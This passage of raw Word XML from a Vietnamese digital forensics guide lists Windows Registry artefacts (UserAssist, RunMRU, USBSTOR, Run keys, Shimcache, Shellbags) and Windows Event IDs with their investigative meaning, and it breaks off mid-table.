          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2694FC">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="các-vị-trí-registry-quan-trọng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Các vị trí Registry quan trọng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3842"/>
        <w:gridCol w:w="6204"/>
      </w:tblGrid>
      <w:tr w14:paraId="6919C12E">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4736839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Đường dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="729689C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Nội dung</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="114AED1F">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24C717C5">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NTUSER.DAT\...\UserAssist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15671FB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Chương trình người dùng đã chạy, số lần chạy và thời gian cuối. GUID thường mã hóa ROT13.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="545F4F14">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48E3885B">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NTUSER.DAT\...\RecentDocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438D237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Tài liệu mở gần đây, phân theo loại tệp, chứa tên và thư mục.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11ADC1C9">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62EF9682">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NTUSER.DAT\...\TypedPaths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37759F9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Đường dẫn được gõ trực tiếp vào thanh địa chỉ Explorer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73532AEB">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0A9B0264">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NTUSER.DAT\...\TypedURLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D66D1C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URL được gõ trực tiếp vào Internet Explorer/Edge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1456C3F6">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11535770">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NTUSER.DAT\...\RunMRU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="241F074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Lịch sử lệnh trong hộp thoại Run.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="26517CEA">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06672B0F">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SYSTEM\...\USBSTOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="765337D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Mọi thiết bị lưu trữ USB từng kết nối: hãng, sản phẩm và serial.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22CDE331">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E3F75E7">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SYSTEM\...\MountedDevices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64E40F6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Ánh xạ ký tự ổ đĩa với GUID thiết bị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13AF16C2">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6389C08A">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SOFTWARE\...\Windows\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1726318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Chương trình tự chạy khi khởi động hệ thống; vị trí persistence phổ biến.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B6F3B88">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5C5A7A79">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NTUSER.DAT\...\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62D33EA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Chương trình tự chạy riêng cho từng người dùng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="08EB43F5">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305E201F">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SYSTEM\...\Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="455D2E9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Dịch vụ Windows đã cài; mã độc thường cài dưới dạng service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2305BA9E">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14DF760E">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SOFTWARE\...\AppCompatCache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="361B8CF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Shimcache - lịch sử chương trình đã thực thi hoặc xuất hiện, kể cả tệp đã xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7343E0C2">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02DBFA36">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NTUSER.DAT\...\Shellbags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="283A5A7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Lịch sử duyệt thư mục, USB và network share, kể cả đối tượng đã xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:tbl>
    <w:p w14:paraId="04586D4F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="windows-event-logs"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.4. Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1118"/>
        <w:gridCol w:w="3345"/>
        <w:gridCol w:w="5583"/>
      </w:tblGrid>
      <w:tr w14:paraId="3ED73061">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1675A025">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="220ABE7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Sự kiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="188F925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Ý nghĩa pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2971D532">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5A1C61A">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4624</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B864CE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Đăng nhập thành công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38AF263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Ai đăng nhập, khi nào, từ đâu và loại đăng nhập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FA4AF80">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7CBDAA5A">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CAADFD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Đăng nhập thất bại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C28B5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Brute force, sai tài khoản hoặc sai mật khẩu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12D6AC9E">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160C5B5D">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4634</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FA72F8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Đăng xuất</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74B2969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Kết hợp 4624 để tính thời lượng phiên.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51FAEC9E">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58E3B353">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41C8FBB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Logon bằng credential tường minh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA88992">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RunAs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>, di chuyển ngang với tài khoản khác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="208A8FE1">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6B49450F">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4672</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="618087F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Gán đặc quyền đặc biệt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A183BD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Phiên có quyền tương đương quản trị viên.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47A4564D">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68D3976A">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50392CD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Tạo tiến trình</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="362B4C6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Rất quan trọng để xác định mã độc và công cụ kẻ tấn công.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71689628">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4319FD6C">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4689</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3194BEB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Tiến trình kết thúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A45377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Tính thời gian chạy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3037EE06">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61324A07">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4698</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51A4AEB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Tạo Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0ED8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Persistence bằng tác vụ lập lịch.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B9CD963">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0DFE040B">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4702</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="147B514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Sửa Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A5CD87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Kẻ tấn công sửa tác vụ hợp lệ có sẵn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D692D3E">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308656F1">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4720</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FAD36D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Tạo tài khoản người dùng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1314B9F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Tài khoản backdoor mới.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B81C7EA">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4FC37C50">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0170D03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Thêm thành viên vào nhóm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BE5202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Leo thang đặc quyền, thường thêm vào Administrators.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10254E8D">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4E22E542">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21AA56E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Yêu cầu Kerberos TGT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6860ED8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Xác thực domain ban đầu, ánh xạ người dùng với máy trạm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="497D99C3">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668D19B7">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4769</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C87CB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Yêu cầu Kerberos Service Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70A845A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Truy cập dịch vụ; Kerberoasting có mẫu đặc trưng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="381300F4">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743954D0">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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7045</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
